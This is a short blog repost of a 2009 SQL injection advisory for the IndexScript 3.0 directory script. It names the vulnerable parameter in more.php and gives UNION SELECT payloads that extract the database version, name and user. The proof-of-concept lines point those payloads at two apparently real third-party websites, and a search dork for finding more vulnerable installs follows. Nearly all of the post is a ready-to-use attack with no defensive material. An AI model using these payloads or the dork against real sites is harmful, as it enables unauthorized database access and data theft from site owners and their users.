Home vulnerabilities IndexScript 3.0 SQL Injection Vuln

IndexScript 3.0 SQL Injection Vuln

By
Saturday, September 12, 2009
Read
Add Comment

[o] IndexScript 3.0 SQL Injection VulnerabilitySoftware : IndexScript version 3.0
Vendor   : http://www.indexscript.com/
Download : http://www.indexscript.com/download.php
Author   : NoGe
Home     : http://antisecurity.org

[o] Vulnerable file
more.php

[o] Exploit
http://localhost/[path]/more.php?cat_id=[SQL]

[o] Proof of Concept
http://texxsmith.com/directory/more.php?cat_id=-3+union+select+1,2,3,4,5,version(),database(),user(),9--
http://www.internetkatalogen.net/more.php?cat_id=-77+union+select+1,2,3,4,5,version(),database(),user(),9--

[o] Dork
"powered by IndexScript"
Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us